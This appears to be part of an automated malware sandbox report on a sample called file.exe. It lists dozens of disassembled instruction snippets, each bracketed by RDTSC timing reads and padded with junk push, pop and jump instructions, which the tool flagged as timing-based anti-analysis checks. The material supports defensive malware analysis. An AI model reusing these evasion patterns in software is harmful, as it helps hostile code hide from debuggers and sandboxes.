                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685D7D second address: 685DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C54B58552h 0x00000011 pushad 0x00000012 jmp 00007F6C54B58550h 0x00000017 jmp 00007F6C54B5854Bh 0x0000001c jmp 00007F6C54B5854Ch 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684462 second address: 68446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684765 second address: 68477D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C54B5854Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684A60 second address: 684A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684A64 second address: 684AEC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C54B58546h 0x00000008 jmp 00007F6C54B5854Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F6C54B58558h 0x00000015 jmp 00007F6C54B58553h 0x0000001a jmp 00007F6C54B58550h 0x0000001f popad 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 jmp 00007F6C54B58550h 0x0000002a jne 00007F6C54B58546h 0x00000030 popad 0x00000031 push ecx 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 pop ecx 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F6C54B58554h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684AEC second address: 684AF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684C87 second address: 684CD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58558h 0x00000007 jmp 00007F6C54B58553h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007F6C54B5854Dh 0x00000014 pop esi 0x00000015 pushad 0x00000016 jne 00007F6C54B58546h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EBF4 second address: 62EBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EBF8 second address: 62EC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C54B5854Eh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f xor ch, FFFFFF8Dh 0x00000012 mov ebx, dword ptr [ebp+1248DB68h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F6C54B58548h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jnl 00007F6C54B58546h 0x00000038 add eax, ebx 0x0000003a js 00007F6C54B5854Ch 0x00000040 mov edx, dword ptr [ebp+124628F0h] 0x00000046 push eax 0x00000047 pushad 0x00000048 jnc 00007F6C54B5854Ch 0x0000004e push ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EC63 second address: 62EC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000004h 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F6C544CAC28h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or cx, 2A0Ah 0x0000002a nop 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EC96 second address: 62ECA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6859B4 second address: 6859B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6859B8 second address: 6859C2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C54B58546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6859C2 second address: 6859C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6859C8 second address: 6859D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68BF51 second address: 68BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68BF55 second address: 68BF70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6C54B58555h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C0D6 second address: 68C0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC34h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CA82 second address: 68CA8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6955AE second address: 6955C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F6C544CAC36h 0x0000000b jmp 00007F6C544CAC2Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6955C5 second address: 6955D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6C54B58548h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F6C54B58546h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6959CC second address: 6959D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6959D8 second address: 6959F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695B43 second address: 695B48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695FB0 second address: 695FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58554h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695FC8 second address: 695FE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6C544CAC35h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0B53 second address: 6A0B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6C54B58546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0B5F second address: 6A0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EC79 second address: 69EC7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EDC2 second address: 69EDD9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C544CAC26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jnc 00007F6C544CAC26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EDD9 second address: 69EDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F16B second address: 69F18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC38h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F18C second address: 69F192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F192 second address: 69F198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F311 second address: 69F332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C54B58556h 0x00000008 jnp 00007F6C54B58546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F332 second address: 69F341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F6C544CAC26h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F495 second address: 69F499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F499 second address: 69F49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F49D second address: 69F4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F4A3 second address: 69F4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F619 second address: 69F636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6C54B58556h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F636 second address: 69F650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F6C544CAC26h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F650 second address: 69F65A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C54B58546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F65A second address: 69F663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F7CA second address: 69F80E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6C54B5856Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F80E second address: 69F839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC32h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F6C544CAC32h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FACB second address: 69FAD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FAD6 second address: 69FADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A318F second address: 6A3195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3195 second address: 6A31AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F6C544CAC33h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B76 second address: 6A7B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B7C second address: 6A7B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B80 second address: 6A7B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A78F5 second address: 6A7909 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6C544CAC32h 0x0000000c jl 00007F6C544CAC26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B88DD second address: 6B88E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B88E6 second address: 6B8923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C544CAC36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F6C544CAC2Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6C544CAC31h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDE68 second address: 6BDE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Eh 0x00000009 jbe 00007F6C54B58546h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDE81 second address: 6BDE95 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F6C544CAC26h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8D51 second address: 6C8D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B58554h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0107 second address: 6D010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CEFD4 second address: 6CEFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CF109 second address: 6CF10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CF24A second address: 6CF250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CF250 second address: 6CF256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CFDCE second address: 6CFDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CFDD2 second address: 6CFE40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F6C544CAC2Ah 0x0000000f jnl 00007F6C544CAC2Eh 0x00000015 popad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F6C544CAC38h 0x0000001f pop ecx 0x00000020 je 00007F6C544CAC33h 0x00000026 pushad 0x00000027 je 00007F6C544CAC26h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D570D second address: 6D5725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58553h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5725 second address: 6D572D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D572D second address: 6D5733 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5733 second address: 6D5742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5742 second address: 6D5746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5746 second address: 6D5771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6C544CAC2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C544CAC35h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7703 second address: 6D7718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7718 second address: 6D771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D771E second address: 6D7733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6C54B5856Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jng 00007F6C54B58546h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7733 second address: 6D7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7737 second address: 6D7743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7743 second address: 6D7747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7747 second address: 6D774B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73F0 second address: 6D73FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73FC second address: 6D7400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7400 second address: 6D740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F6C544CAC28h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D740E second address: 6D743D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F6C54B5854Eh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C54B58559h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB702 second address: 6DB708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB708 second address: 6DB730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58552h 0x00000007 jmp 00007F6C54B5854Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DCCCE second address: 6DCCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2163 second address: 6E21AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 jnc 00007F6C54B5857Ch 0x0000001a jmp 00007F6C54B58556h 0x0000001f jnc 00007F6C54B58560h 0x00000025 jmp 00007F6C54B58554h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2537 second address: 6F255B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007F6C544CAC26h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6C544CAC31h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F255B second address: 6F255F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F23DF second address: 6F23E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5B81 second address: 6F5B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8680 second address: 6F8699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6C544CAC26h 0x0000000a popad 0x0000000b jnp 00007F6C544CAC2Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8699 second address: 6F86A5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C54B5854Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
